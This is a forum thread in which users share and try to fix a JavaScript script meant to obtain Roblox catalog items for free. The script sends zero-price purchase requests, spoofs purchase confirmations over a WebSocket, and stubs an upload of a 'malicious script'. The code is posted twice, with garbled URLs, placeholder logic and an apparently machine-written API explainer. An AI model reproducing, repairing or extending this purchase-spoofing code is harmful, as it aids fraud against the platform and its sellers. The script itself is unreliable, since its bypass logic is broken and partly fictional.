Possibly Related Threads…

wasteful_disgrace · (This post was last modified: Jul 12, 2024, 03:38 AM by wasteful_disgrace.)

Ive been working on a roblox exploit script that uses API Vuln to get stuff for free but i can't get it to work. Maybe you guys can fix it or make it more davance then me.

If you have anything to say about this script please do so, and if you got it to work congrats.

function pillageRoblox() {
// Get the item ID from the input field
const itemId = document.getElementById('itemId').value;
// Fetch item details from the Roblox Catalog API
fetch(https://catalog.roblox.com/v1/catalog/it...6;{itemId})
  .then(response => response.json())
  .then(data => {
   // Extract item details (e.g., name, price)
   const itemDetails = data.data[0];
   const itemName = itemDetails.name;
   const itemPrice = itemDetails.price;
   console.log(Targeting ${itemName} (Price: ${itemPrice}));
   // Prepare the payload with modified price
   const payload = {
    productId: itemId, // Include the product ID
    attempt_robux_amount: 0, // Set to 0 for free acquisition
    upsell_platform: "WEB",
    user_robux_balance: 0
   };
   // *** WebSocket Shenanigans ***
   const socket = new WebSocket('wss://realtime-signalr.roblox.com/userhub');
   let purchaseAttemptDetected = false; // Flag to track purchase attempts
   socket.onopen = () => {
    console.log('WebSocket connection opened');
   };
   socket.onmessage = (event) => {
    console.log("WebSocket message:", event.data);
    // Analyze WebSocket data and extract relevant information
    const message = JSON.parse(event.data);
    // ... Look for patterns that indicate purchase attempts or vulnerabilities
    // ... Potentially send spoofed messages to manipulate the system
    // Example: Detect purchase attempts
    if (message.hasOwnProperty('purchaseAttempt') && message.purchaseAttempt === true) {
     purchaseAttemptDetected = true;
     console.log('Purchase attempt detected!');
    }
    // Example: Send spoofed messages (if purchase attempt detected)
    if (purchaseAttemptDetected && message.hasOwnProperty('confirmationRequired')) {
     const spoofedMessage = {
      confirmationRequired: false,
      purchaseId: message.purchaseId,
      confirmationAction: 'CONFIRM'
     };
     socket.send(JSON.stringify(spoofedMessage));
    }
   };
   socket.onerror = (error) => {
    console.error("WebSocket error:", error);
   };
   socket.onclose = (event) => {
    console.log("WebSocket connection closed");
   };
   // *** Economy Exploitation ***
   // Send a purchase request to get the seller ID
   fetch(https://economy.roblox.com/v1/purchases/products/${itemId}, {
    method: 'POST',
    headers: {
     'Content-Type': 'application/json'
    },
    body: JSON.stringify(payload)
   })
   .then(response => response.json())
   .then(data => {
    console.log("Economy API response:", data);
    const sellerId = data.expectedSellerId; // Extract the seller ID
    // Craft the spoofed message
    const spoofedMessage = {
     "productId": itemId,
     "expectedCurrency": 1,
     "expectedPrice": 0,
     "expectedSellerId": sellerId,
     "purchased": true,
     "reason": "Success"
    };
    // Send the spoofed message
    fetch(https://economy.roblox.com/v1/purchases/products/${itemId}, {
     method: 'POST',
     headers: {
      'Content-Type': 'application/json'
     },
     body: JSON.stringify(spoofedMessage)
    })
    .then(response => response.json())
    .then(data => {
     console.log("Spoofed purchase response:", data);
     // Check for success or failure based on the response
     // ... Example:
     if (data.status === 'SUCCESS') {
      alert("✅ Your item was successfully purchased!"); // Alert the user
     } else {
      alert("❌ Purchase failed! Try again later."); // Alert the user
     }
    })
    .catch(error => console.error("Error making spoofed purchase:", error));
   })
   .catch(error => console.error("Error with Economy API:", error));
   // *** Upload Infiltration ***
   // Prepare file upload data
   const fileData = new FormData();
   // ... Add file data or a malicious script to upload
   // ...
   fetch('https://ncs.roblox.com/upload', {
    method: 'POST',
    body: fileData
   })
   .then(response => response.json())
   .then(data => {
    console.log("Upload API response:", data);
    // Analyze the response and check if the upload was successful
    // ...
   })
   .catch(error => console.error("Error with Upload API:", error));
  })
  .catch(error => console.error("Error fetching item details:", error));
}

ITS a java Script By the way

wasteful_disgrace · Jul 12, 2024, 04:04 PM

(Jul 12, 2024, 03:26 PM)funniguy Wrote: is this serversided?

It could possible be, I just hope there is someone who knows how to fix it.

wasteful_disgrace · Jul 12, 2024, 04:47 PM

(Jul 12, 2024, 04:16 PM)voidgod15 Wrote: i don't know javascript but when i took a look at the code and try to run it it give me a error I think I fixed the error but idk what is the URL https://catalog.roblox.com/v1/catalog/it...6;{itemId}
if you can explain I can try and fix it

function pillageRoblox() {
// Get the item ID from the input field
const itemId = document.getElementById('itemId').value;
// Fetch item details from the Roblox Catalog API
fetch("https://catalog.roblox.com/v1/catalog/it...ails?items=${itemId}")
.then(response => response.json())
.then(data => {
// Extract item details (e.g., name, price)
const itemDetails = data.data[0];
const itemName = itemDetails.name;
const itemPrice = itemDetails.price;
console.log("{itemName}".Target);
console.log("{itemPrice}".Price);
// Prepare the payload with modified price
const payload = {
productId: itemId, // Include the product ID
attempt_robux_amount: 0, // Set to 0 for free acquisition
upsell_platform: "WEB",
user_robux_balance: 0
};
// *** WebSocket Shenanigans ***
const socket = new WebSocket('wss://realtime-signalr.roblox.com/userhub');
let purchaseAttemptDetected = false; // Flag to track purchase attempts
socket.onopen = () => {
console.log('WebSocket connection opened');
};
socket.onmessage = (event) => {
console.log("WebSocket message:", event.data);
// Analyze WebSocket data and extract relevant information
const message = JSON.parse(event.data);
// ... Look for patterns that indicate purchase attempts or vulnerabilities
// ... Potentially send spoofed messages to manipulate the system
// Example: Detect purchase attempts
if (message.hasOwnProperty('purchaseAttempt') && message.purchaseAttempt === true) {
purchaseAttemptDetected = true;
console.log('Purchase attempt detected!');
}
// Example: Send spoofed messages (if purchase attempt detected)
if (purchaseAttemptDetected && message.hasOwnProperty('confirmationRequired')) {
const spoofedMessage = {
confirmationRequired: false,
purchaseId: message.purchaseId,
confirmationAction: 'CONFIRM'
};
socket.send(JSON.stringify(spoofedMessage));
}
};
socket.onerror = (error) => {
console.error("WebSocket error:", error);
};
socket.onclose = (event) => {
console.log("WebSocket connection closed");
};
// *** Economy Exploitation ***
// Send a purchase request to get the seller ID
fetch("https://economy.roblox.com/v1/purchases/products/${itemId}", {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(payload)
})
.then(response => response.json())
.then(data => {
console.log("Economy API response:", data);
const sellerId = data.expectedSellerId; // Extract the seller ID
// Craft the spoofed message
const spoofedMessage = {
"productId": itemId,
"expectedCurrency": 1,
"expectedPrice": 0,
"expectedSellerId": sellerId,
"purchased": true,
"reason": "Success"
};
// Send the spoofed message
fetch("https://economy.roblox.com/v1/purchases/products/${itemId}", {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(spoofedMessage)
})
.then(response => response.json())
.then(data => {
console.log("Spoofed purchase response:", data);
// Check for success or failure based on the response
// ... Example:
if (data.status === 'SUCCESS') {
alert("✅ Your item was successfully purchased!"); // Alert the user
} else {
alert("❌ Purchase failed! Try again later."); // Alert the user
}
})
.catch(error => console.error("Error making spoofed purchase:", error));
})
.catch(error => console.error("Error with Economy API:", error));
// *** Upload Infiltration ***
// Prepare file upload data
const fileData = new FormData();
// ... Add file data or a malicious script to upload
// ...
fetch('https://ncs.roblox.com/upload', {
method: 'POST',
body: fileData
})
.then(response => response.json())
.then(data => {
console.log("Upload API response:", data);
// Analyze the response and check if the upload was successful
// ...
})
.catch(error => console.error("Error with Upload API:", error));
})
.catch(error => console.error("Error fetching item details:", error));
}

can you add me on discord v0idg0d1

the URL for the Roblox Catalog API endpoint Ive been using is to fetch information about specific items.
Let's break it down:

https://catalog.roblox.com/v1/catalog/items/details: The is the base URL for the Catalog API's "details" endpoint.
?items=${itemId}: This is a query parameter that tells the API which item we want to retrieve. The itemId is the unique ID of the Roblox item you're interested in.

Here's how it works:

You provide the itemId to the script.
The script constructs the complete URL by replacing ${itemId} with the actual item ID.
The script sends a request to the API using the fetch method.
The API returns a JSON response containing details about the item.

What information does this API return?
This API endpoint provides a wealth of information about the item, including:

name: The name of the item.
description: A description of the item.
price: The price of the item in Robux.
creator: The name of the person who created the item.
assetId: The unique asset ID of the item.
assetType: The type of asset (e.g., "Hair Accessory", "Shirt", "Place").
assetIsWearable: Whether the item can be worn by an avatar.
isForSale: Whether the item is currently available for purchase.
isLimited: Whether the item is a limited-edition item.
isLimitedUnique: Whether the item is a unique limited-edition item.
... and more!

Why do we use this API?
We need this API to:

Get the item ID: To craft the correct purchase request.
Get the item name: To display to the user which item they're trying to acquire.
Get the item price: To confirm that we're targeting the correct item and for any other necessary manipulation.
Get other relevant details: The API provides valuable information that might be useful for crafting exploits.

kingjohn98 · Jul 12, 2024, 05:03 PM

The Roblox API is server-side based. But there was a time when some things were clint-side like: name, id, account creation date etc. You could make your name ROBLOX and troll kids and it was pretty funny, then when it got out of hand, they made everything server-side.

wasteful_disgrace · Jul 12, 2024, 05:09 PM

funniguy dateline='[url=tel:1720803078' Wrote: 1720803078[/url]']

wasteful_disgrace dateline='[url=tel:1720802859' Wrote: 1720802859[/url]']

voidgod15 dateline='[url=tel:1720801017' Wrote: 1720801017[/url]']
i don't know javascript but when i took a look at the code and try to run it it give me a error I think I fixed the error but idk what is the URL https://catalog.roblox.com/v1/catalog/it...6;{itemId}
if you can explain I can try and fix it

function pillageRoblox() {
// Get the item ID from the input field
const itemId = document.getElementById('itemId').value;
// Fetch item details from the Roblox Catalog API
fetch("https://catalog.roblox.com/v1/catalog/it...ails?items=${itemId}")
.then(response => response.json())
.then(data => {
// Extract item details (e.g., name, price)
const itemDetails = data.data[0];
const itemName = itemDetails.name;
const itemPrice = itemDetails.price;
console.log("{itemName}".Target);
console.log("{itemPrice}".Price);
// Prepare the payload with modified price
const payload = {
productId: itemId, // Include the product ID
attempt_robux_amount: 0, // Set to 0 for free acquisition
upsell_platform: "WEB",
user_robux_balance: 0
};
// *** WebSocket Shenanigans ***
const socket = new WebSocket('wss://realtime-signalr.roblox.com/userhub');
let purchaseAttemptDetected = false; // Flag to track purchase attempts
socket.onopen = () => {
console.log('WebSocket connection opened');
};
socket.onmessage = (event) => {
console.log("WebSocket message:", event.data);
// Analyze WebSocket data and extract relevant information
const message = JSON.parse(event.data);
// ... Look for patterns that indicate purchase attempts or vulnerabilities
// ... Potentially send spoofed messages to manipulate the system
// Example: Detect purchase attempts
if (message.hasOwnProperty('purchaseAttempt') && message.purchaseAttempt === true) {
purchaseAttemptDetected = true;
console.log('Purchase attempt detected!');
}
// Example: Send spoofed messages (if purchase attempt detected)
if (purchaseAttemptDetected && message.hasOwnProperty('confirmationRequired')) {
const spoofedMessage = {
confirmationRequired: false,
purchaseId: message.purchaseId,
confirmationAction: 'CONFIRM'
};
socket.send(JSON.stringify(spoofedMessage));
}
};
socket.onerror = (error) => {
console.error("WebSocket error:", error);
};
socket.onclose = (event) => {
console.log("WebSocket connection closed");
};
// *** Economy Exploitation ***
// Send a purchase request to get the seller ID
fetch("https://economy.roblox.com/v1/purchases/products/${itemId}", {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(payload)
})
.then(response => response.json())
.then(data => {
console.log("Economy API response:", data);
const sellerId = data.expectedSellerId; // Extract the seller ID
// Craft the spoofed message
const spoofedMessage = {
"productId": itemId,
"expectedCurrency": 1,
"expectedPrice": 0,
"expectedSellerId": sellerId,
"purchased": true,
"reason": "Success"
};
// Send the spoofed message
fetch("https://economy.roblox.com/v1/purchases/products/${itemId}", {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(spoofedMessage)
})
.then(response => response.json())
.then(data => {
console.log("Spoofed purchase response:", data);
// Check for success or failure based on the response
// ... Example:
if (data.status === 'SUCCESS') {
alert("✅ Your item was successfully purchased!"); // Alert the user
} else {
alert("❌ Purchase failed! Try again later."); // Alert the user
}
})
.catch(error => console.error("Error making spoofed purchase:", error));
})
.catch(error => console.error("Error with Economy API:", error));
// *** Upload Infiltration ***
// Prepare file upload data
const fileData = new FormData();
// ... Add file data or a malicious script to upload
// ...
fetch('https://ncs.roblox.com/upload', {
method: 'POST',
body: fileData
})
.then(response => response.json())
.then(data => {
console.log("Upload API response:", data);
// Analyze the response and check if the upload was successful
// ...
})
.catch(error => console.error("Error with Upload API:", error));
})
.catch(error => console.error("Error fetching item details:", error));
}

can you add me on discord v0idg0d1

the URL for the Roblox Catalog API endpoint Ive been using is to fetch information about specific items.
Let's break it down:
https://catalog.roblox.com/v1/catalog/items/details: The is the base URL for the Catalog API's "details" endpoint.

?items=${itemId}: This is a query parameter that tells the API which item we want to retrieve. The itemId is the unique ID of the Roblox item you're interested in.

Here's how it works:

You provide the itemId to the script.

The script constructs the complete URL by replacing ${itemId} with the actual item ID.

The script sends a request to the API using the fetch method.

The API returns a JSON response containing details about the item.

What information does this API return?
This API endpoint provides a wealth of information about the item, including:
name: The name of the item.

description: A description of the item.

price: The price of the item in Robux.

creator: The name of the person who created the item.

assetId: The unique asset ID of the item.

assetType: The type of asset (e.g., "Hair Accessory", "Shirt", "Place").

assetIsWearable: Whether the item can be worn by an avatar.

isForSale: Whether the item is currently available for purchase.

isLimited: Whether the item is a limited-edition item.

isLimitedUnique: Whether the item is a unique limited-edition item.

... and more!

Why do we use this API?
We need this API to:
Get the item ID: To craft the correct purchase request.

Get the item name: To display to the user which item they're trying to acquire.

Get the item price: To confirm that we're targeting the correct item and for any other necessary manipulation.

Get other relevant details: The API provides valuable information that might be useful for crafting exploits.

its probably because of " https://catalog.roblox.com/v1/catalog/it...6;{itemId}" and i think it should be "https://catalog.roblox.com/v1/catalog/itemdetails?items=${itemId}"

Yeah you’re right I’ve been stuck trying remember what I edited out. Thanks for reminding me

YungJhit · Sep 05, 2024, 03:17 AM

thanks for this information very helpful

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.

workingforyou · Sep 06, 2024, 04:29 PM

this was not working for me, but will try it again later today at some point.

Quann · Sep 15, 2024, 09:30 AM

is this client sided?

tekojet500 · Oct 14, 2024, 11:18 AM

thanks!!! this is great

DredgenSun · Oct 14, 2024, 12:55 PM

https://i2-prod.mirror.co.uk/incoming/ar...enders.jpg

The only item grant I cared about Big Grin

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	What are your guy favorite video games of all time that you played or watched?	xRaidsBear	97	26,979	10 hours ago Last Post: nale
	Give me games to play	jahy	93	68,178	10 hours ago Last Post: nale
	What games might still have a player base in 100 years?	farcas	98	29,823	10 hours ago Last Post: nale
	Free premium planes on MS20 - MS24	sacage_x64	2	761	Yesterday, 06:33 PM Last Post: PizzaGoblin136563
	Favourite PS2 Games	DredgenSun	52	4,658	Yesterday, 02:41 PM Last Post: idir